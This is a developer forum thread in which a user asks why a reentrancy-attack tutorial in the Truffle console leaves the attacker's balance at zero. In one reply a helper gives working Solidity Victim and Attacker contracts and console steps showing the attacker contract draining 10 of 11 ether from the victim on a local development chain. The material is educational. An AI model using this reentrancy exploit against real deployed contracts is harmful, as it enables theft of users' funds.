Output of Reentrancy Attack tutorial in Truffle console is always zero

Support
#1

I am trying to do a tutorial available at:

I have created modified contracts which are stored here:

in the contracts folder, 3 files are stored (Attacker.sol, Victim.sol and Migration.sol) and migrations folder contains .js files. I have also stored all the required commands in the file: commands.odt or in the commands.txt file.

I am able to run all the commands related to both the victim and the attacker but the output for the balance of attacker is always zero as shown below:

Attacker.deployed().then(contract => attacker = contract); "Testing Attacker"

'Testing Attacker'

truffle(development)>
balance3 = await web3.eth.getBalance(attacker.address)`

undefined

truffle(development)>
web3.utils.fromWei(balance3, “ether”)`

'0'

truffle(development)>
attacker.attack()`

{ tx:

truffle(development)>
balance3 = await web3.eth.getBalance(attacker.address)`

undefined

truffle(development)>
web3.utils.fromWei(balance3, “ether”)`

'0' (still Zero)

Again there is no error, but balance for the attacker is always zero.

Somebody please guide me.

Zulfi.

1 Like
#2

So has the contract Victim beed attacked successfully? That is has the balance of eth in the VIctim decreased?

1 Like
#3

Hi,
Thanks for your response. The output of victim is same before and after the attack: i.e. 33

$ truffle console

truffle(development)> accounts = await web3.eth.getAccounts()

undefined

truffle(development)> accounts

[ '0x2b8fd9FCaf60A5b1cea3806B14722f25D0EBDFf8',

```‘0x466ebB5718b12573bdAF2a9fe35B7358bb28a0AE’,`

```‘0x17F00e031881C3655c70347a6Be69c21641D4ebb’,`

```‘0x11d85c951D421Bb693dF4d98D3A5535EAF7a6665’,`

```‘0xe65d9A0fef5ccb80458565d1E2ea5FAf0B28e545’,`

```‘0x1925Ae6C1fB70C7b8008c9C5032c467Eada031ef’,`

```‘0xEb46395754F8F1Ca9fd0EB396198a7Ae3E826E3A’,`

```‘0x14013061B27Ed677bd37e3b20103aA99a52e58D9’,`

```‘0xF0067DaC625FcDbd1827345Aa556beEa56Dc2956’,`

```‘0xBa18E1e671CB46906f26633dF7F0C149a227b0E6’ ]`

truffle(development)> acc1 = accounts[0]

'0x2b8fd9FCaf60A5b1cea3806B14722f25D0EBDFf8'

truffle(development)> balance1 = await web3.eth.getBalance(acc1)

undefined

truffle(development)> web3.utils.fromWei(balance1, "ether")

'77.99831488'

truffle(development)> Victim.deployed().then(contract=>victim = contract); "testing"

'testing''testing'

truffle(development)> Victim.deployed().then(contract=>victim = contract); "testing"

'testing'

truffle(development)> balance2 = await web3.eth.getBalance(victim.address)

undefined

truffle(development)> web3.utils.fromWei(balance2, "ether")

'22'

truffle(development)> options = { from: acc1, to : victim.address, value: web3.utils.toWei('11', 'ether')}

{ from: '0x2b8fd9FCaf60A5b1cea3806B14722f25D0EBDFf8',

```to: ‘0xB5b35A50962598682B09c5d13DcCe6db2017F7b6’,`

```value: ‘11000000000000000000’ }`

truffle(development)> victim.deposit.sendTransaction(options)

{ tx:

```‘0x84929944787455534a0b28fe0aebaa7a0d99f9f900addd1381d539e96bb2e38a’,`

```receipt:`

```{ transactionHash:`

```‘0x84929944787455534a0b28fe0aebaa7a0d99f9f900addd1381d539e96bb2e38a’,`

```transactionIndex: 0,`

```blockHash:`

```‘0x4ef63efa3ca0aae13554a6b3257b4045a6a910b5f38ec85854eadbf70c711a9b’,`

```blockNumber: 5,`

```from: ‘0x2b8fd9fcaf60a5b1cea3806b14722f25d0ebdff8’,`

```to: ‘0xb5b35a50962598682b09c5d13dcce6db2017f7b6’,`

```gasUsed: 21064,`

```cumulativeGasUsed: 21064,`

```contractAddress: null,`

```logs: ,`

```status: true,`

```logsBloom:`

```‘0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000’,`

```rawLogs: },`

```logs: }`

truffle(development)> balance2 = await web3.eth.getBalance(victim.address)

undefined

truffle(development)> web3.utils.fromWei(balance2, "ether")

'33'

truffle(development)> balance1 = await web3.eth.getBalance(acc1)

undefined

truffle(development)> web3.utils.fromWei(balance1, "ether")

'66.9978936'

truffle(development)> Attacker.deployed().then(contract => attacker = contract); "Testing Attacker"

'Testing Attacker'

truffle(development)> balance3 = await web3.eth.getBalance(attacker.address)

undefined

truffle(development)> web3.utils.fromWei(balance3, "ether")

'0'

truffle(development)> attacker.attack()

{ tx:

```‘0x9055be3734feea1a47976fceb98d148b0ee9c9d9d5716a58adf1b8a54dbbb272’,`

```receipt:`

```{ transactionHash:`

```‘0x9055be3734feea1a47976fceb98d148b0ee9c9d9d5716a58adf1b8a54dbbb272’,`

```transactionIndex: 0,`

```blockHash:`

```‘0x0c72b8de4de4ecdb0783cc4b850911b9a67cf2082ef299e950cffbd69e500875’,`

```blockNumber: 6,`

```from: ‘0x2b8fd9fcaf60a5b1cea3806b14722f25d0ebdff8’,`

```to: ‘0x802e8d5ffb65d788e8b0f240a0deefcf8f07b7b7’,`

```gasUsed: 21064,`

```cumulativeGasUsed: 21064,`

```contractAddress: null,`

```logs: ,`

```status: true,`

```logsBloom:`

```‘0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000’,`

```rawLogs: },`

```logs: }`

truffle(development)> balance3 = await web3.eth.getBalance(attacker.address)

undefined

truffle(development)> web3.utils.fromWei(balance3, "ether")

'0'

truffle(development)> balance2 = await web3.eth.getBalance(victim.address)

undefined

truffle(development)> web3.utils.fromWei(balance2, "ether")

'33'

truffle(development)>

Please guide me.

Zulfi.

1 Like
#4

Hi @zak100,

I followed the instructions in the blog post (after updating to Solidity 0.5) and was able to reproduce as expected. You can try the following:

Victim.sol

pragma solidity ^0.5.0;

contract Victim{

   function  withdraw() public {
      
      uint256 transferAmt = 1 ether;
      (bool success, ) = msg.sender.call.value(transferAmt)("");
      require(success);
   }
   function deposit() public payable {}
}

Attacker.sol

pragma solidity ^0.5.0;

import './Victim.sol';

contract Attacker {
  Victim v;
  uint256 public count;

  event LogFallback(uint256 c, uint256 balance);

  constructor(address victim) public {
    v = Victim(victim);
  }

  function attack() public {
    v.withdraw();
  }

  function () external payable {
    count++;
    emit LogFallback(count, address(this).balance);
    if (count < 10) {
      v.withdraw();
    } 
  }
}

Interact

$ npx truffle develop
Truffle Develop started at http://127.0.0.1:9545/
...

truffle(develop)> const victim = await Victim.new()
undefined
truffle(develop)> const attacker = await Attacker.new(victim.address)
undefined
truffle(develop)> await victim.deposit({from: accounts[1], value: web3.utils.toWei('11', 'ether')})
{ tx:
...
truffle(develop)> (await web3.eth.getBalance(accounts[1])).toString()
'88999576320000000000'
truffle(develop)> (await web3.eth.getBalance(victim.address)).toString()
'11000000000000000000'
truffle(develop)> (await web3.eth.getBalance(attacker.address)).toString()
'0'
truffle(develop)> await attacker.attack()
{ tx:
...
truffle(develop)> (await web3.eth.getBalance(attacker.address)).toString()
'10000000000000000000'
truffle(develop)> (await web3.eth.getBalance(victim.address)).toString()
'1000000000000000000'

I recommend having a look at: Reentrancy After Istanbul.

As an aside, I recommend formatting your posts to make them easier to read using code blocks.

```
Code block
```

2 Likes
#5

Dear abcoathup-lots of thanks for solving my problem.

Zulfi.

1 Like